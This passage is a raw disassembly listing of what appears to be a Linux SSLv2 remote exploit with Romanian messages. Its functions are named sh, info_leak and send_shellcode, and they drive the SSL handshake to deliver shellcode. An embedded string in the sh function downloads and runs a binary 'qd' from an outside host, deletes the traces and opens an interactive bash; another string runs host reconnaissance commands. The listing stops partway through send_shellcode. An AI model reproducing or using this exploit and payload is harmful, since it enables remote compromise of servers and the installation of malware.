08048f8c <__do_global_dtors_aux+0x5c> ret    
08048f8d <__do_global_dtors_aux+0x5d> lea    0x0(%esi),%esi

---- Function : fini_dummy ----
08048f90 <fini_dummy> push   %ebp
08048f91 <fini_dummy+0x1> mov    %esp,%ebp
08048f93 <fini_dummy+0x3> sub    $0x8,%esp
08048f96 <fini_dummy+0x6> mov    %ebp,%esp
08048f98 <fini_dummy+0x8> pop    %ebp
08048f99 <fini_dummy+0x9> ret    
08048f9a <fini_dummy+0xa> lea    0x0(%esi),%esi

---- Function : frame_dummy ----
08048fa0 <frame_dummy> push   %ebp
08048fa1 <frame_dummy+0x1> mov    $0x8048bdc,%eax
08048fa6 <frame_dummy+0x6> mov    %esp,%ebp
08048fa8 <frame_dummy+0x8> sub    $0x8,%esp
08048fab <frame_dummy+0xb> test   %eax,%eax
08048fad <frame_dummy+0xd> je     08048fc4 <frame_dummy+0x24>
08048faf <frame_dummy+0xf> sub    $0x8,%esp
08048fb2 <frame_dummy+0x12> push   $0x804e4d0
08048fb7 <frame_dummy+0x17> push   $0x804e300
08048fbc <frame_dummy+0x1c> call   08048bdc <_init+0x48>
08048fc1 <frame_dummy+0x21> add    $0x10,%esp

Referenced from jump at 08048fad ; 

08048fc4 <frame_dummy+0x24> mov    %ebp,%esp
08048fc6 <frame_dummy+0x26> pop    %ebp
08048fc7 <frame_dummy+0x27> ret    
08048fc8 <frame_dummy+0x28> nop    
08048fc9 <frame_dummy+0x29> lea    0x0(%esi,1),%esi

---- Function : init_dummy ----
08048fd0 <init_dummy> push   %ebp
08048fd1 <init_dummy+0x1> mov    %esp,%ebp
08048fd3 <init_dummy+0x3> sub    $0x8,%esp
08048fd6 <init_dummy+0x6> mov    %ebp,%esp
08048fd8 <init_dummy+0x8> pop    %ebp
08048fd9 <init_dummy+0x9> ret    
08048fda <init_dummy+0xa> lea    0x0(%esi),%esi

---- Function : sh ----

Referenced from call at 080497c6 ; 

08048fe0 <sh> push   %ebp
08048fe1 <sh+0x1> mov    %esp,%ebp
08048fe3 <sh+0x3> push   %esi
08048fe4 <sh+0x4> push   %ebx
08048fe5 <sh+0x5> sub    $0x890,%esp
08048feb <sh+0xb> movl   $0x0,0xfffff76c(%ebp)
08048ff5 <sh+0x15> sub    $0x8,%esp

Possible reference to string:
"TERM=xterm; cd /tmp/; wget -dbc silviu.250free.com/x/qd >>/dev/null; sleep 8; rm -rf wget*; chmod +x qd; ./qd >>/dev/null; rm -rf /tmp/qd; export TERM=xterm; exec bash -i"

08048ff8 <sh+0x18> push   $0x804bbe0
08048ffd <sh+0x1d> lea    0xfffffbf8(%ebp),%eax
08049003 <sh+0x23> push   %eax
08049004 <sh+0x24> call   08048ecc <_init+0x338>
08049009 <sh+0x29> add    $0x10,%esp
0804900c <sh+0x2c> sub    $0x4,%esp
0804900f <sh+0x2f> lea    0xfffffbf8(%ebp),%eax
08049015 <sh+0x35> sub    $0x8,%esp
08049018 <sh+0x38> push   %eax
08049019 <sh+0x39> call   08048d1c <_init+0x188>
0804901e <sh+0x3e> add    $0xc,%esp
08049021 <sh+0x41> mov    %eax,%eax
08049023 <sh+0x43> mov    %eax,%eax
08049025 <sh+0x45> push   %eax
08049026 <sh+0x46> lea    0xfffffbf8(%ebp),%eax
0804902c <sh+0x4c> push   %eax
0804902d <sh+0x4d> pushl  0x8(%ebp)
08049030 <sh+0x50> call   08048bec <_init+0x58>
08049035 <sh+0x55> add    $0x10,%esp
08049038 <sh+0x58> sub    $0x8,%esp

Possible reference to string:
"uname -a; cat /etc/issue; cat /etc/*-release; id; w;"

0804903b <sh+0x5b> push   $0x804bca0
08049040 <sh+0x60> lea    0xfffffbf8(%ebp),%eax
08049046 <sh+0x66> push   %eax
08049047 <sh+0x67> call   08048ecc <_init+0x338>
0804904c <sh+0x6c> add    $0x10,%esp
0804904f <sh+0x6f> sub    $0x4,%esp
08049052 <sh+0x72> lea    0xfffffbf8(%ebp),%eax
08049058 <sh+0x78> sub    $0x8,%esp
0804905b <sh+0x7b> push   %eax
0804905c <sh+0x7c> call   08048d1c <_init+0x188>
08049061 <sh+0x81> add    $0xc,%esp
08049064 <sh+0x84> mov    %eax,%eax
08049066 <sh+0x86> mov    %eax,%eax
08049068 <sh+0x88> push   %eax
08049069 <sh+0x89> lea    0xfffffbf8(%ebp),%eax
0804906f <sh+0x8f> push   %eax
08049070 <sh+0x90> pushl  0x8(%ebp)
08049073 <sh+0x93> call   08048bec <_init+0x58>
08049078 <sh+0x98> add    $0x10,%esp
0804907b <sh+0x9b> nop    

Referenced from jump at 08049202 ; 080492ff ; 

0804907c <sh+0x9c> sub    $0xc,%esp
0804907f <sh+0x9f> pushl  0x804e4c4
08049085 <sh+0xa5> call   08048bfc <_init+0x68>
0804908a <sh+0xaa> add    $0x10,%esp
0804908d <sh+0xad> mov    %eax,%eax
0804908f <sh+0xaf> shr    $0x5,%eax
08049092 <sh+0xb2> imul   $0x4,%eax,%esi
08049095 <sh+0xb5> lea    0xfffff778(%ebp),%eax
0804909b <sh+0xbb> mov    %eax,%ebx
0804909d <sh+0xbd> sub    $0xc,%esp
080490a0 <sh+0xc0> pushl  0x804e4c4
080490a6 <sh+0xc6> call   08048bfc <_init+0x68>
080490ab <sh+0xcb> add    $0x10,%esp
080490ae <sh+0xce> mov    %eax,%eax
080490b0 <sh+0xd0> and    $0x1f,%eax
080490b3 <sh+0xd3> bts    %eax,(%esi,%ebx,1)
080490b7 <sh+0xd7> mov    0x8(%ebp),%eax
080490ba <sh+0xda> shr    $0x5,%eax
080490bd <sh+0xdd> imul   $0x4,%eax,%ecx
080490c0 <sh+0xe0> lea    0xfffff778(%ebp),%eax
080490c6 <sh+0xe6> mov    %eax,%edx
080490c8 <sh+0xe8> mov    0x8(%ebp),%eax
080490cb <sh+0xeb> and    $0x1f,%eax
080490ce <sh+0xee> bts    %eax,(%ecx,%edx,1)
080490d2 <sh+0xf2> sub    $0xc,%esp
080490d5 <sh+0xf5> pushl  0x804e4c4
080490db <sh+0xfb> call   08048bfc <_init+0x68>
080490e0 <sh+0x100> add    $0x10,%esp
080490e3 <sh+0x103> mov    %eax,%eax
080490e5 <sh+0x105> cmp    0x8(%ebp),%eax
080490e8 <sh+0x108> jle    08049108 <sh+0x128>
080490ea <sh+0x10a> sub    $0xc,%esp
080490ed <sh+0x10d> pushl  0x804e4c4
080490f3 <sh+0x113> call   08048bfc <_init+0x68>
080490f8 <sh+0x118> add    $0x10,%esp
080490fb <sh+0x11b> mov    %eax,%eax
080490fd <sh+0x11d> inc    %eax
080490fe <sh+0x11e> mov    %eax,0xfffff768(%ebp)
08049104 <sh+0x124> jmp    08049112 <sh+0x132>
08049106 <sh+0x126> mov    %esi,%esi

Referenced from jump at 080490e8 ; 

08049108 <sh+0x128> mov    0x8(%ebp),%eax
0804910b <sh+0x12b> inc    %eax
0804910c <sh+0x12c> mov    %eax,0xfffff768(%ebp)

Referenced from jump at 08049104 ; 

08049112 <sh+0x132> mov    0xfffff768(%ebp),%eax
08049118 <sh+0x138> mov    %eax,0xfffff774(%ebp)
0804911e <sh+0x13e> sub    $0xc,%esp
08049121 <sh+0x141> push   $0x0
08049123 <sh+0x143> push   $0x0
08049125 <sh+0x145> push   $0x0
08049127 <sh+0x147> lea    0xfffff778(%ebp),%eax
0804912d <sh+0x14d> push   %eax
0804912e <sh+0x14e> pushl  0xfffff774(%ebp)
08049134 <sh+0x154> call   08048c2c <_init+0x98>
08049139 <sh+0x159> add    $0x20,%esp
0804913c <sh+0x15c> sub    $0xc,%esp
0804913f <sh+0x15f> pushl  0x804e4c4
08049145 <sh+0x165> call   08048bfc <_init+0x68>
0804914a <sh+0x16a> add    $0x10,%esp
0804914d <sh+0x16d> mov    %eax,%eax
0804914f <sh+0x16f> mov    %eax,%ebx
08049151 <sh+0x171> and    $0x1f,%ebx
08049154 <sh+0x174> sub    $0xc,%esp
08049157 <sh+0x177> pushl  0x804e4c4
0804915d <sh+0x17d> call   08048bfc <_init+0x68>
08049162 <sh+0x182> add    $0x10,%esp
08049165 <sh+0x185> mov    %eax,%eax
08049167 <sh+0x187> shr    $0x5,%eax
0804916a <sh+0x18a> imul   $0x4,%eax,%edx
0804916d <sh+0x18d> lea    0xfffff778(%ebp),%eax
08049173 <sh+0x193> mov    %eax,%eax
08049175 <sh+0x195> bt     %ebx,(%edx,%eax,1)
08049179 <sh+0x199> setb   %al
0804917c <sh+0x19c> test   %al,%al
0804917e <sh+0x19e> je     080491e0 <sh+0x200>
08049180 <sh+0x1a0> sub    $0x8,%esp
08049183 <sh+0x1a3> push   $0x400
08049188 <sh+0x1a8> lea    0xfffffbf8(%ebp),%eax
0804918e <sh+0x1ae> push   %eax
0804918f <sh+0x1af> call   08048dec <_init+0x258>
08049194 <sh+0x1b4> add    $0x10,%esp
08049197 <sh+0x1b7> sub    $0x4,%esp
0804919a <sh+0x1ba> pushl  0x804e4c4
080491a0 <sh+0x1c0> push   $0x3fe
080491a5 <sh+0x1c5> lea    0xfffffbf8(%ebp),%eax
080491ab <sh+0x1cb> push   %eax
080491ac <sh+0x1cc> call   08048cdc <_init+0x148>
080491b1 <sh+0x1d1> add    $0x10,%esp
080491b4 <sh+0x1d4> sub    $0x4,%esp
080491b7 <sh+0x1d7> lea    0xfffffbf8(%ebp),%eax
080491bd <sh+0x1dd> sub    $0x8,%esp
080491c0 <sh+0x1e0> push   %eax
080491c1 <sh+0x1e1> call   08048d1c <_init+0x188>
080491c6 <sh+0x1e6> add    $0xc,%esp
080491c9 <sh+0x1e9> mov    %eax,%eax
080491cb <sh+0x1eb> mov    %eax,%eax
080491cd <sh+0x1ed> push   %eax
080491ce <sh+0x1ee> lea    0xfffffbf8(%ebp),%eax
080491d4 <sh+0x1f4> push   %eax
080491d5 <sh+0x1f5> pushl  0x8(%ebp)
080491d8 <sh+0x1f8> call   08048bec <_init+0x58>
080491dd <sh+0x1fd> add    $0x10,%esp

Referenced from jump at 0804917e ; 

080491e0 <sh+0x200> mov    0x8(%ebp),%eax
080491e3 <sh+0x203> mov    %eax,%ecx
080491e5 <sh+0x205> and    $0x1f,%ecx
080491e8 <sh+0x208> mov    0x8(%ebp),%eax
080491eb <sh+0x20b> shr    $0x5,%eax
080491ee <sh+0x20e> imul   $0x4,%eax,%edx
080491f1 <sh+0x211> lea    0xfffff778(%ebp),%eax
080491f7 <sh+0x217> mov    %eax,%eax
080491f9 <sh+0x219> bt     %ecx,(%edx,%eax,1)
080491fd <sh+0x21d> setb   %al
08049200 <sh+0x220> test   %al,%al
08049202 <sh+0x222> je     0804907c <sh+0x9c>
08049208 <sh+0x228> sub    $0x8,%esp
0804920b <sh+0x22b> push   $0x400
08049210 <sh+0x230> lea    0xfffff7f8(%ebp),%eax
08049216 <sh+0x236> push   %eax
08049217 <sh+0x237> call   08048dec <_init+0x258>
0804921c <sh+0x23c> add    $0x10,%esp
0804921f <sh+0x23f> sub    $0x4,%esp
08049222 <sh+0x242> push   $0x400
08049227 <sh+0x247> lea    0xfffff7f8(%ebp),%eax
0804922d <sh+0x24d> push   %eax
0804922e <sh+0x24e> pushl  0x8(%ebp)
08049231 <sh+0x251> call   08048ebc <_init+0x328>
08049236 <sh+0x256> add    $0x10,%esp
08049239 <sh+0x259> mov    %eax,%eax
0804923b <sh+0x25b> mov    %eax,0xfffff770(%ebp)
08049241 <sh+0x261> cmpl   $0xffffffff,0xfffff770(%ebp)
08049248 <sh+0x268> jne    08049284 <sh+0x2a4>
0804924a <sh+0x26a> sub    $0x8,%esp
0804924d <sh+0x26d> sub    $0x4,%esp
08049250 <sh+0x270> sub    $0x4,%esp
08049253 <sh+0x273> call   08048c6c <_init+0xd8>
08049258 <sh+0x278> add    $0x4,%esp
0804925b <sh+0x27b> mov    %eax,%eax
0804925d <sh+0x27d> mov    %eax,%eax
0804925f <sh+0x27f> pushl  (%eax)
08049261 <sh+0x281> call   08048c3c <_init+0xa8>
08049266 <sh+0x286> add    $0x8,%esp
08049269 <sh+0x289> mov    %eax,%eax
0804926b <sh+0x28b> push   %eax

Possible reference to string:
"Eroare : %s"

0804926c <sh+0x28c> push   $0x804bcd7
08049271 <sh+0x291> call   08048d8c <_init+0x1f8>
08049276 <sh+0x296> add    $0x10,%esp
08049279 <sh+0x299> sub    $0xc,%esp
0804927c <sh+0x29c> push   $0x1
0804927e <sh+0x29e> call   08048dfc <_init+0x268>
08049283 <sh+0x2a3> nop    

Referenced from jump at 08049248 ; 

08049284 <sh+0x2a4> cmpl   $0x0,0xfffff770(%ebp)
0804928b <sh+0x2ab> jne    080492cc <sh+0x2ec>
0804928d <sh+0x2ad> cmpl   $0x0,0xfffff76c(%ebp)
08049294 <sh+0x2b4> jne    080492b0 <sh+0x2d0>
08049296 <sh+0x2b6> sub    $0xc,%esp

Possible reference to string:
"Stagiul 2 ShellCode Gresit."

08049299 <sh+0x2b9> push   $0x804bce4
0804929e <sh+0x2be> call   08048d8c <_init+0x1f8>
080492a3 <sh+0x2c3> add    $0x10,%esp
080492a6 <sh+0x2c6> mov    $0x0,%eax
080492ab <sh+0x2cb> jmp    08049304 <sh+0x324>
080492ad <sh+0x2cd> lea    0x0(%esi),%esi

Referenced from jump at 08049294 ; 

080492b0 <sh+0x2d0> sub    $0xc,%esp

Possible reference to string:
"Conexiune Pirdută."

080492b3 <sh+0x2d3> push   $0x804bd02
080492b8 <sh+0x2d8> call   08048d8c <_init+0x1f8>
080492bd <sh+0x2dd> add    $0x10,%esp
080492c0 <sh+0x2e0> sub    $0xc,%esp
080492c3 <sh+0x2e3> push   $0x1
080492c5 <sh+0x2e5> call   08048dfc <_init+0x268>
080492ca <sh+0x2ea> mov    %esi,%esi

Referenced from jump at 0804928b ; 

080492cc <sh+0x2ec> movl   $0x1,0xfffff76c(%ebp)
080492d6 <sh+0x2f6> sub    $0x8,%esp
080492d9 <sh+0x2f9> pushl  0x804e4c0
080492df <sh+0x2ff> lea    0xfffff7f8(%ebp),%eax
080492e5 <sh+0x305> push   %eax
080492e6 <sh+0x306> call   08048d0c <_init+0x178>
080492eb <sh+0x30b> add    $0x10,%esp
080492ee <sh+0x30e> sub    $0xc,%esp
080492f1 <sh+0x311> pushl  0x804e4c0
080492f7 <sh+0x317> call   08048c1c <_init+0x88>
080492fc <sh+0x31c> add    $0x10,%esp
080492ff <sh+0x31f> jmp    0804907c <sh+0x9c>

Referenced from jump at 080492ab ; 

08049304 <sh+0x324> lea    0xfffffff8(%ebp),%esp
08049307 <sh+0x327> pop    %ebx
08049308 <sh+0x328> pop    %esi
08049309 <sh+0x329> pop    %ebp
0804930a <sh+0x32a> ret    
0804930b <sh+0x32b> nop    

---- Function : info_leak ----

Referenced from call at 08049cfd ; 

0804930c <info_leak> push   %ebp
0804930d <info_leak+0x1> mov    %esp,%ebp
0804930f <info_leak+0x3> sub    $0x4018,%esp
08049315 <info_leak+0x9> sub    $0xc,%esp
08049318 <info_leak+0xc> pushl  0x8(%ebp)
0804931b <info_leak+0xf> call   0804a744 <send_client_hello>
08049320 <info_leak+0x14> add    $0x10,%esp
08049323 <info_leak+0x17> sub    $0xc,%esp
08049326 <info_leak+0x1a> pushl  0x8(%ebp)
08049329 <info_leak+0x1d> call   0804a818 <get_server_hello>
0804932e <info_leak+0x22> add    $0x10,%esp
08049331 <info_leak+0x25> sub    $0x4,%esp
08049334 <info_leak+0x28> mov    0xc(%ebp),%eax
08049337 <info_leak+0x2b> pushl  0x8(%eax)
0804933a <info_leak+0x2e> mov    0xc(%ebp),%eax
0804933d <info_leak+0x31> pushl  0x4(%eax)
08049340 <info_leak+0x34> pushl  0x8(%ebp)
08049343 <info_leak+0x37> call   0804ac6c <send_client_master_key>
08049348 <info_leak+0x3c> add    $0x10,%esp
0804934b <info_leak+0x3f> sub    $0xc,%esp
0804934e <info_leak+0x42> pushl  0x8(%ebp)
08049351 <info_leak+0x45> call   0804af9c <generate_session_keys>
08049356 <info_leak+0x4a> add    $0x10,%esp
08049359 <info_leak+0x4d> sub    $0xc,%esp
0804935c <info_leak+0x50> pushl  0x8(%ebp)
0804935f <info_leak+0x53> call   0804b058 <get_server_verify>
08049364 <info_leak+0x58> add    $0x10,%esp
08049367 <info_leak+0x5b> sub    $0xc,%esp
0804936a <info_leak+0x5e> pushl  0x8(%ebp)
0804936d <info_leak+0x61> call   0804b1cc <send_client_finished>
08049372 <info_leak+0x66> add    $0x10,%esp
08049375 <info_leak+0x69> sub    $0x4,%esp
08049378 <info_leak+0x6c> push   $0x4000
0804937d <info_leak+0x71> lea    0xffffbff8(%ebp),%eax
08049383 <info_leak+0x77> push   %eax
08049384 <info_leak+0x78> pushl  0x8(%ebp)
08049387 <info_leak+0x7b> call   0804b24c <get_server_finished>
0804938c <info_leak+0x80> add    $0x10,%esp
0804938f <info_leak+0x83> mov    %eax,%eax
08049391 <info_leak+0x85> mov    %eax,0xffffbff4(%ebp)
08049397 <info_leak+0x8b> mov    0x8(%ebp),%eax
0804939a <info_leak+0x8e> cmpl   $0x0,0x7c(%eax)
0804939e <info_leak+0x92> je     080493c4 <info_leak+0xb8>
080493a0 <info_leak+0x94> sub    $0x8,%esp
080493a3 <info_leak+0x97> mov    0x8(%ebp),%eax
080493a6 <info_leak+0x9a> sub    $0xffffff80,%eax
080493a9 <info_leak+0x9d> push   %eax

Possible reference to string:
"%s"

080493aa <info_leak+0x9e> push   $0x804bd16
080493af <info_leak+0xa3> call   08048d8c <_init+0x1f8>
080493b4 <info_leak+0xa8> add    $0x10,%esp
080493b7 <info_leak+0xab> sub    $0xc,%esp
080493ba <info_leak+0xae> push   $0x1
080493bc <info_leak+0xb0> call   08048dfc <_init+0x268>
080493c1 <info_leak+0xb5> lea    0x0(%esi),%esi

Referenced from jump at 0804939e ; 

080493c4 <info_leak+0xb8> sub    $0x8,%esp
080493c7 <info_leak+0xbb> mov    0xc(%ebp),%edx
080493ca <info_leak+0xbe> pushl  0xffffbff4(%ebp)
080493d0 <info_leak+0xc4> lea    0xffffbff8(%ebp),%eax
080493d6 <info_leak+0xca> push   %eax
080493d7 <info_leak+0xcb> mov    0x1c(%edx),%eax
080493da <info_leak+0xce> call   *%eax
080493dc <info_leak+0xd0> add    $0x10,%esp
080493df <info_leak+0xd3> mov    %eax,%edx
080493e1 <info_leak+0xd5> mov    0x8(%ebp),%eax
080493e4 <info_leak+0xd8> mov    %edx,0x480(%eax)
080493ea <info_leak+0xde> sub    $0x8,%esp
080493ed <info_leak+0xe1> mov    0xc(%ebp),%edx
080493f0 <info_leak+0xe4> pushl  0xffffbff4(%ebp)
080493f6 <info_leak+0xea> lea    0xffffbff8(%ebp),%eax
080493fc <info_leak+0xf0> push   %eax
080493fd <info_leak+0xf1> mov    0x20(%edx),%eax
08049400 <info_leak+0xf4> call   *%eax
08049402 <info_leak+0xf6> add    $0x10,%esp
08049405 <info_leak+0xf9> mov    %eax,%edx
08049407 <info_leak+0xfb> mov    0x8(%ebp),%eax
0804940a <info_leak+0xfe> mov    %edx,0x484(%eax)
08049410 <info_leak+0x104> mov    $0x1,%eax
08049415 <info_leak+0x109> leave  
08049416 <info_leak+0x10a> ret    
08049417 <info_leak+0x10b> nop    

---- Function : send_shellcode ----

Referenced from call at 08049ddf ; 

08049418 <send_shellcode> push   %ebp
08049419 <send_shellcode+0x1> mov    %esp,%ebp
0804941b <send_shellcode+0x3> push   %ebx
0804941c <send_shellcode+0x4> sub    $0x4014,%esp
08049422 <send_shellcode+0xa> sub    $0xc,%esp

Possible reference to string:
": Trimitem ShellCode"

08049425 <send_shellcode+0xd> push   $0x804bd1a
0804942a <send_shellcode+0x12> call   08048d8c <_init+0x1f8>
0804942f <send_shellcode+0x17> add    $0x10,%esp
08049432 <send_shellcode+0x1a> sub    $0xc,%esp
08049435 <send_shellcode+0x1d> mov    0x8(%ebp),%eax
08049438 <send_shellcode+0x20> pushl  (%eax)
0804943a <send_shellcode+0x22> call   08049f38 <get_local_port>
0804943f <send_shellcode+0x27> add    $0x10,%esp
08049442 <send_shellcode+0x2a> mov    %eax,%eax
08049444 <send_shellcode+0x2c> mov    %eax,0xffffbfec(%ebp)
0804944a <send_shellcode+0x32> sub    $0xc,%esp
0804944d <send_shellcode+0x35> pushl  0x8(%ebp)
08049450 <send_shellcode+0x38> call   0804a744 <send_client_hello>
08049455 <send_shellcode+0x3d> add    $0x10,%esp
08049458 <send_shellcode+0x40> sub    $0xc,%esp
0804945b <send_shellcode+0x43> pushl  0x8(%ebp)
0804945e <send_shellcode+0x46> call   0804a818 <get_server_hello>
08049463 <send_shellcode+0x4b> add    $0x10,%esp
08049466 <send_shellcode+0x4e> sub    $0x8,%esp
08049469 <send_shellcode+0x51> mov    0xc(%ebp),%eax
0804946c <send_shellcode+0x54> mov    0x4(%eax),%edx
0804946f <send_shellcode+0x57> mov    0xc(%ebp),%eax
08049472 <send_shellcode+0x5a> pushl  0x8(%eax)
08049475 <send_shellcode+0x5d> pushl  0x14(%ebp)
08049478 <send_shellcode+0x60> pushl  0x10(%ebp)
0804947b <send_shellcode+0x63> pushl  0xffffbfec(%ebp)
08049481 <send_shellcode+0x69> push   $0x4000
08049486 <send_shellcode+0x6e> lea    0xffffbff8(%ebp),%eax
0804948c <send_shellcode+0x74> push   %eax
0804948d <send_shellcode+0x75> mov    0x24(%edx),%eax
08049490 <send_shellcode+0x78> call   *%eax
08049492 <send_shellcode+0x7a> add    $0x20,%esp
08049495 <send_shellcode+0x7d> mov    %eax,%eax
08049497 <send_shellcode+0x7f> mov    %eax,0xffffbff4(%ebp)
0804949d <send_shellcode+0x85> sub    $0x4,%esp
080494a0 <send_shellcode+0x88> pushl  0xffffbff4(%ebp)
080494a6 <send_shellcode+0x8e> lea    0xffffbff8(%ebp),%eax
080494ac <send_shellcode+0x94> push   %eax
080494ad <send_shellcode+0x95> pushl  0x8(%ebp)
080494b0 <send_shellcode+0x98> call   0804ac6c <send_client_master_key>
080494b5 <send_shellcode+0x9d> add    $0x10,%esp
080494b8 <send_shellcode+0xa0> sub    $0xc,%esp
080494bb <send_shellcode+0xa3> pushl  0x8(%ebp)
080494be <send_shellcode+0xa6> call   0804af9c <generate_session_keys>
080494c3 <send_shellcode+0xab> add    $0x10,%esp
080494c6 <send_shellcode+0xae> sub    $0xc,%esp
080494c9 <send_shellcode+0xb1> pushl  0x8(%ebp)
080494cc <send_shellcode+0xb4> call   0804b058 <get_server_verify>
080494d1 <send_shellcode+0xb9> add    $0x10,%esp
080494d4 <send_shellcode+0xbc> movl   $0x0,0xffffbff0(%ebp)
080494de <send_shellcode+0xc6> mov    %esi,%esi

Referenced from jump at 08049518 ; 

080494e0 <send_shellcode+0xc8> mov    0x8(%ebp),%edx
080494e3 <send_shellcode+0xcb> mov    0xffffbff0(%ebp),%eax
080494e9 <send_shellcode+0xd1> cmp    0x44(%edx),%eax
080494ec <send_shellcode+0xd4> jl     080494f0 <send_shellcode+0xd8>
080494ee <send_shellcode+0xd6> jmp    0804951c <send_shellcode+0x104>

Referenced from jump at 080494ec ; 

080494f0 <send_shellcode+0xd8> call   08048e9c <_init+0x308>
080494f5 <send_shellcode+0xdd> mov    %eax,%ebx
080494f7 <send_shellcode+0xdf> mov    0x8(%ebp),%eax
080494fa <send_shellcode+0xe2> mov    0xffffbff0(%ebp),%ecx
08049500 <send_shellcode+0xe8> add    $0x40,%ecx
08049503 <send_shellcode+0xeb> add    $0x8,%eax
08049506 <send_shellcode+0xee> mov    %eax,%edx
08049508 <send_shellcode+0xf0> mov    %ebx,%eax
0804950a <send_shellcode+0xf2> sar    $0x18,%eax
0804950d <send_shellcode+0xf5> mov    %al,(%ecx,%edx,1)
08049510 <send_shellcode+0xf8> lea    0xffffbff0(%ebp),%eax
08049516 <send_shellcode+0xfe> incl   (%eax)
08049518 <send_shellcode+0x100> jmp    080494e0 <send_shellcode+0xc8>
0804951a <send_shellcode+0x102> mov    %esi,%esi

Referenced from jump at 080494ee ; 

0804951c <send_shellcode+0x104> sub    $0xc,%esp
0804951f <send_shellcode+0x107> pushl  0x8(%ebp)
08049522 <send_shellcode+0x10a> call   0804b1cc <send_client_finished>
08049527 <send_shellcode+0x10f> add    $0x10,%esp
0804952a <send_shellcode+0x112> sub    $0xc,%esp
0804952d <send_shellcode+0x115> pushl  0x8(%ebp)
08049530 <send_shellcode+0x118> call   0804b3e4 <get_server_error>
08049535 <send_shellcode+0x11d> add    $0x10,%esp
08049538 <send_shellcode+0x120> mov    0x8(%ebp),%eax
0804953b <send_shellcode+0x123> cmpl   $0x0,0x7c(%eax)
0804953f <send_shellcode+0x127> je     08049564 <send_shellcode+0x14c>
08049541 <send_shellcode+0x129> sub    $0x8,%esp
08049544 <send_shellcode+0x12c> mov    0x8(%ebp),%eax
08049547 <send_shellcode+0x12f> sub    $0xffffff80,%eax
0804954a <send_shellcode+0x132> push   %eax

Possible reference to string:
"%s"

0804954b <send_shellcode+0x133> push   $0x804bd30
08049550 <send_shellcode+0x138> call   08048d8c <_init+0x1f8>
08049555 <send_shellcode+0x13d> add    $0x10,%esp
08049558 <send_shellcode+0x140> sub    $0xc,%esp
0804955b <send_shellcode+0x143> push   $0x1
0804955d <send_shellcode+0x145> call   08048dfc <_init+0x268>
08049562 <send_shellcode+0x14a> mov    %esi,%esi

Referenced from jump at 0804953f ; 

08049564 <send_shellcode+0x14c> sub    $0x4,%esp
08049567 <send_shellcode+0x14f> mov    0xc(%ebp),%eax
0804956a <send_shellcode+0x152> mov    0x4(%eax),%eax
0804956d <send_shellcode+0x155> pushl  0x18(%eax)
08049570 <send_shellcode+0x158> mov    0xc(%ebp),%eax
08049573 <send_shellcode+0x15b> mov    0x4(%eax),%eax
08049576 <send_shellcode+0x15e> pushl  0x14(%eax)
08049579 <send_shellcode+0x161> mov    0x8(%ebp),%eax
0804957c <send_shellcode+0x164> pushl  (%eax)
0804957e <send_shellcode+0x166> call   08048bec <_init+0x58>
08049583 <send_shellcode+0x16b> add    $0x10,%esp
08049586 <send_shellcode+0x16e> sub    $0x4,%esp
08049589 <send_shellcode+0x171> push   $0x3
0804958b <send_shellcode+0x173> lea    0xffffbff8(%ebp),%eax
08049591 <send_shellcode+0x179> push   %eax
08049592 <send_shellcode+0x17a> mov    0x8(%ebp),%eax
08049595 <send_shellcode+0x17d> pushl  (%eax)
08049597 <send_shellcode+0x17f> call   08048ebc <_init+0x328>
0804959c <send_shellcode+0x184> add    $0x10,%esp
0804959f <send_shellcode+0x187> mov    %eax,%eax
080495a1 <send_shellcode+0x189> mov    %eax,0xffffbff4(%ebp)
080495a7 <send_shellcode+0x18f> cmpl   $0x0,0xffffbff4(%ebp)
080495ae <send_shellcode+0x196> jns    080495ec <send_shellcode+0x1d4>
080495b0 <send_shellcode+0x198> sub    $0x8,%esp
080495b3 <send_shellcode+0x19b> sub    $0x4,%esp
080495b6 <send_shellcode+0x19e> sub    $0x4,%esp
080495b9 <send_shellcode+0x1a1> call   08048c6c <_init+0xd8>
080495be <send_shellcode+0x1a6> add    $0x4,%esp
080495c1 <send_shellcode+0x1a9> mov    %eax,%eax
080495c3 <send_shellcode+0x1ab> mov    %eax,%eax
080495c5 <send_shellcode+0x1ad> pushl  (%eax)
080495c7 <send_shellcode+0x1af> call   08048c3c <_init+0xa8>
080495cc <send_shellcode+0x1b4> add    $0x8,%esp
080495cf <send_shellcode+0x1b7> mov    %eax,%eax
080495d1 <send_shellcode+0x1b9> push   %eax

Possible reference to string:
"Eroare In Citire: %s"

080495d2 <send_shellcode+0x1ba> push   $0x804bd35
080495d7 <send_shellcode+0x1bf> call   08048d8c <_init+0x1f8>
080495dc <send_shellcode+0x1c4> add    $0x10,%esp
080495df <send_shellcode+0x1c7> sub    $0xc,%esp
080495e2 <send_shellcode+0x1ca> push   $0x1
080495e4 <send_shellcode+0x1cc> call   08048dfc <_init+0x268>
080495e9 <send_shellcode+0x1d1> lea    0x0(%esi),%esi

Referenced from jump at 080495ae ; 

080495ec <send_shellcode+0x1d4> cmpl   $0x0,0xffffbff4(%ebp)
080495f3 <send_shellcode+0x1db> jne    08049610 <send_shellcode+0x1f8>
080495f5 <send_shellcode+0x1dd> sub    $0xc,%esp

Possible reference to string:
"Conexiune Esuată"

080495f8 <send_shellcode+0x1e0> push   $0x804bd4b
080495fd <send_shellcode+0x1e5> call   08048d8c <_init+0x1f8>
08049602 <send_shellcode+0x1ea> add    $0x10,%esp
08049605 <send_shellcode+0x1ed> mov    $0x0,%eax
0804960a <send_shellcode+0x1f2> jmp    080497d2 <send_shellcode+0x3ba>
0804960f <send_shellcode+0x1f7> nop    

Referenced from jump at 080495f3 ; 

08049610 <send_shellcode+0x1f8> cmpl   $0x3,0xffffbff4(%ebp)
08049617 <send_shellcode+0x1ff> je     08049634 <send_shellcode+0x21c>
08049619 <send_shellcode+0x201> sub    $0xc,%esp

Possible reference to string:
"Mai Putini De 4 Byti Next"

0804961c <send_shellcode+0x204> push   $0x804bd5d
08049621 <send_shellcode+0x209> call   08048d8c <_init+0x1f8>
08049626 <send_shellcode+0x20e> add    $0x10,%esp
08049629 <send_shellcode+0x211> mov    $0x0,%eax
0804962e <send_shellcode+0x216> jmp    080497d2 <send_shellcode+0x3ba>
08049633 <send_shellcode+0x21b> nop    

Referenced from jump at 08049617 ; 

08049634 <send_shellcode+0x21c> mov    0xc(%ebp),%eax
08049637 <send_shellcode+0x21f> mov    0x4(%eax),%ecx
0804963a <send_shellcode+0x222> mov    0xc(%ebp),%eax
0804963d <send_shellcode+0x225> mov    0x4(%eax),%eax
08049640 <send_shellcode+0x228> lea    0xffffbff8(%ebp),%edx
08049646 <send_shellcode+0x22e> sub    $0x4,%esp
08049649 <send_shellcode+0x231> pushl  0x18(%ecx)
